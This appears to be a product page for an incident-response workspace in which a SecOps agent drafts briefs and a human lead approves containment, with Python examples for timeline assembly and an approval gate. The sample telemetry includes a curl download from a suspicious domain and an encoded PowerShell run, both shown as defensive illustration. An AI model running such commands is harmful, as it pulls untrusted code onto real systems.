When an alert fires, the response team needs three things fast: a clean timeline, the indicators of compromise, and a containment decision that someone signed. Dock gives a SecOps agent a workspace to assemble all three. The agent pulls events from CrowdStrike, correlates them in Splunk, ties them to the PagerDuty page, and drafts a response brief. The security lead reads the brief in Dock and approves containment from the same row. The audit trail comes out of the workflow, not a separate write-up.
CrowdStrike, Splunk, and PagerDuty stay the system of record for the raw data. Dock is the system of record for what the agent interprets. Each Dock row carries a pointer back to the platform record, agent identity, decision, reviewer, and timestamp. The agent re-fetches platform data via fresh API reads when it needs current state.
The incident table
| Incident ID | PD Page | Hosts | IoCs | Stage | Agent Recommendation | Approver | Status |
|---|---|---|---|---|---|---|---|
| INC-3318 | PD-88421 | api-prod-07 | hash:a91f, ip:185.x.x.42 | Containment | Isolate host, block hash org-wide | sarah@ | Approved 14:22 |
| INC-3319 | PD-88425 | mac-eng-12 | domain:cdn-update.win | Triage | Quarantine, request memory image | (pending) | Drafting |
| INC-3320 | PD-88431 | k8s-pay-04 | suspicious egress 9.4 GB | Investigation | No containment, monitor 24h | govind@ | Approved 14:51 |
Each row stores the CrowdStrike detection IDs, the Splunk search that produced the correlation, and the PagerDuty incident link. The Recommendation column is the agent's read. The Approver column is the human who signed it.
The workflow
A PagerDuty page lands. The agent opens INC-3319, pulls the triggering CrowdStrike detection, runs a Splunk search across the prior six hours of process and DNS telemetry from the affected host, and lays the events on a timeline ordered by host clock. It tags techniques against the MITRE ATT&CK matrix so the lead can scan the kill chain in one column. It drafts a response brief with the IoCs, the blast radius (which other hosts touched the same domain), and a recommended containment action.
Containment is a dangerous operation. The agent does not isolate the host itself. It posts the brief to the row and pings the on-call security lead. The lead reads the brief, opens the CrowdStrike console from the row link to confirm current state, and clicks Approve. Dock writes the approval to the row, then the agent fires the isolation call against CrowdStrike under the lead's authority. The PagerDuty incident gets a comment with the Dock row link.
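The brief-assembly step above (timeline ordered by host clock, ATT&CK tags, blast radius) as an added Python example. This is not Dock's code or any vendor SDK: the event fields, the kind-to-technique lookup, and the telemetry rows are all constructed for illustration, and the source references are placeholders rather than real CrowdStrike or Splunk identifiers.

```python
# Added example (not Dock's code): assemble the timeline, ATT&CK tags and
# blast radius for a response brief from constructed telemetry. Field names,
# the technique lookup and the sample rows are assumptions for illustration.
from dataclasses import dataclass
from datetime import datetime, timezone

# Illustrative kind -> ATT&CK technique lookup. The IDs are real technique IDs;
# which event kinds map to them is an assumption, not a vendor mapping.
TECHNIQUE_FOR_KIND = {
    "dns": "T1071.004",                 # Application Layer Protocol: DNS
    "download": "T1105",                # Ingress Tool Transfer
    "process:powershell": "T1059.001",  # Command and Scripting Interpreter: PowerShell
}


@dataclass(frozen=True)
class Event:
    ts: datetime     # host clock, UTC
    host: str
    kind: str
    detail: str
    source: str      # "crowdstrike" or "splunk"
    source_ref: str  # pointer back to the platform record (placeholder here)


def utc(s: str) -> datetime:
    return datetime.fromisoformat(s).replace(tzinfo=timezone.utc)


# Constructed sample telemetry: one CrowdStrike detection plus Splunk process/DNS
# rows from the prior six hours. Deliberately out of order to show the sort.
SAMPLE_EVENTS = [
    Event(utc("2024-05-02T13:41:15"), "mac-eng-12", "process:powershell",
          "pwsh -enc <redacted>", "crowdstrike", "detection:constructed-1"),
    Event(utc("2024-05-02T13:41:12"), "mac-eng-12", "download",
          "curl -o /tmp/u.bin http://cdn-update.win/u", "splunk", "search:constructed-sid"),
    Event(utc("2024-05-02T13:41:10"), "mac-eng-12", "dns",
          "cdn-update.win", "splunk", "search:constructed-sid"),
    Event(utc("2024-05-02T12:05:00"), "mac-eng-12", "dns",
          "github.com", "splunk", "search:constructed-sid"),
    Event(utc("2024-05-02T13:39:02"), "mac-eng-04", "dns",
          "cdn-update.win", "splunk", "search:constructed-sid"),
]


def timeline(events, host):
    """Events for one host, ordered by host clock, each tagged with a technique (or None)."""
    rows = sorted((e for e in events if e.host == host), key=lambda e: e.ts)
    return [(e, TECHNIQUE_FOR_KIND.get(e.kind)) for e in rows]


def blast_radius(events, indicator, primary_host):
    """Other hosts whose telemetry mentions the indicator value ("domain:x", "hash:y", "ip:z")."""
    _, value = indicator.split(":", 1)
    return sorted({e.host for e in events if e.host != primary_host and value in e.detail})


def draft_brief(events, host, indicators, recommendation):
    """What the lead reads before approving: IoCs, timeline, techniques, blast radius, the agent's read."""
    tl = timeline(events, host)
    return {
        "host": host,
        "iocs": list(indicators),
        "timeline": [(e.ts.isoformat(), e.kind, tag, e.source_ref) for e, tag in tl],
        "techniques": sorted({tag for _, tag in tl if tag}),
        "blast_radius": {i: blast_radius(events, i, host) for i in indicators},
        "recommendation": recommendation,
    }


if __name__ == "__main__":
    brief = draft_brief(SAMPLE_EVENTS, "mac-eng-12", ["domain:cdn-update.win"],
                        "Quarantine, request memory image")
    for line in brief["timeline"]:
        print(*line)
    print("techniques:", brief["techniques"])
    print("blast radius:", brief["blast_radius"])
```

Every timeline entry keeps its `source_ref`, which is what lets the row point back to the platform record instead of copying the raw event into Dock.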
Why this matters
The post-incident review is the part SecOps teams dread. Three tools, three exports, one analyst stitching a story. Dock removes the stitching. The timeline, the recommendation, the approver, and the resulting platform action are one row. The agent's identity is on every interpretation, separate from the human who approved containment. This is the same primitive the DevOps incident workflow uses for production outages, applied to a security context where attribution carries legal weight.
Audit and compliance teams read the same row. The agent audit log feeds the compliance evidence packet without a separate collection pass.
Start with one detection type on the SecOps pillar.
FAQ
Does the agent ever contain a host on its own? No. Isolation, hash-blocking, account disable, and egress rules are all gated. The agent drafts, a security lead approves, and the agent then calls the platform API under the approval.
What standard does the timeline follow? The brief structure mirrors the phases in NIST SP 800-61 Rev. 2: detection and analysis, containment, eradication, recovery, post-incident. Each phase has its own column in the row so the post-mortem writes itself.
How does Dock handle false positives? A row can close at Triage with a Recommendation of "no action, suppression rule X added." The CrowdStrike and Splunk pointers stay attached, so the next similar detection inherits context.
Can two agents work the same incident? Yes, but each interpretation is attributed separately. If a triage agent escalates to a forensics agent, the row shows two agent identities with their own recommendations, and the human lead approves against the merged brief.
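The approval gate described in the workflow section and in the first and last FAQ answers, as an added Python example. It is not Dock's code: the row fields mirror the incident table on the page, but the function names, the gated-action set, the approver address and the platform stub are assumptions. The point it shows is fail-closed behaviour: a gated action is refused until an approval naming exactly that action exists, a non-gated action runs without one, and every entry in the audit list names the agent or human who did it.

```python
# Added example (not Dock's code): a row that records the agent's read and the
# human's approval separately, and refuses to call the platform for a gated
# action until the matching approval exists. The platform call is a stand-in,
# not the CrowdStrike API; identifiers and the approver address are constructed.
from dataclasses import dataclass, field
from datetime import datetime, timezone
from typing import Callable, List, Optional

# The gated operations the page lists; names are assumptions.
GATED_ACTIONS = {"isolate_host", "block_hash", "disable_account", "egress_rule"}


@dataclass(frozen=True)
class Recommendation:
    agent_id: str    # which agent produced this read
    action: str
    rationale: str
    ts: datetime


@dataclass(frozen=True)
class Approval:
    approver: str    # the human who signed
    agent_id: str    # whose recommendation was signed
    action: str
    ts: datetime


@dataclass
class IncidentRow:
    incident_id: str
    pd_page: str
    host: str
    detection_ids: List[str]   # pointers back to CrowdStrike (placeholders here)
    splunk_search: str         # pointer back to the correlation search
    stage: str = "Triage"
    recommendations: List[Recommendation] = field(default_factory=list)
    approval: Optional[Approval] = None
    audit: List[dict] = field(default_factory=list)


class ApprovalRequired(Exception):
    pass


def recommend(row, agent_id, action, rationale, now):
    rec = Recommendation(agent_id, action, rationale, now)
    row.recommendations.append(rec)
    row.audit.append({"actor": agent_id, "event": "recommend", "action": action, "ts": now.isoformat()})
    return rec


def approve(row, approver, rec, now):
    """The lead signs one specific recommendation; the signature names the agent and the action."""
    row.approval = Approval(approver, rec.agent_id, rec.action, now)
    row.stage = "Containment"
    row.audit.append({"actor": approver, "event": "approve", "action": rec.action,
                      "of_agent": rec.agent_id, "ts": now.isoformat()})
    return row.approval


def execute(row, agent_id, action, platform: Callable[[str, str], dict], now):
    """Fail closed: a gated action runs only with an approval for exactly that action."""
    gated = action in GATED_ACTIONS
    a = row.approval
    if gated and (a is None or a.action != action):
        row.audit.append({"actor": agent_id, "event": "blocked", "action": action, "ts": now.isoformat()})
        raise ApprovalRequired(f"{action} on {row.host} needs a signed approval")
    result = platform(row.host, action)
    row.audit.append({"actor": agent_id, "event": "execute", "action": action,
                      "under": a.approver if gated else None, "ts": now.isoformat()})
    return result


def fake_platform(host, action):
    # Stand-in for the vendor API call; only reports what would have been done.
    return {"host": host, "action": action, "status": "ok"}


def scenario():
    """Triage agent drafts; isolation is refused; a forensics agent adds its own read and runs a
    non-gated step; the lead signs the triage recommendation; the agent isolates under it."""
    t0 = datetime(2024, 5, 2, 14, 0, tzinfo=timezone.utc)
    row = IncidentRow("INC-3319", "PD-88425", "mac-eng-12",
                      ["detection:constructed-1"], "search:constructed-sid")
    rec = recommend(row, "agent:triage", "isolate_host", "beacon to cdn-update.win, encoded pwsh", t0)
    blocked = False
    try:
        execute(row, "agent:triage", "isolate_host", fake_platform, t0)
    except ApprovalRequired:
        blocked = True
    recommend(row, "agent:forensics", "request_memory_image", "capture before isolation", t0)
    execute(row, "agent:forensics", "request_memory_image", fake_platform, t0)  # not gated
    approve(row, "lead@", rec, t0)  # constructed approver address
    result = execute(row, "agent:triage", "isolate_host", fake_platform, t0)
    return row, blocked, result


if __name__ == "__main__":
    row, blocked, result = scenario()
    print("first isolation attempt blocked:", blocked)
    for entry in row.audit:
        print(entry)
```

The approval is checked against the action name, not just its presence, so an approval for one gated action cannot be reused to run a different one on the same row.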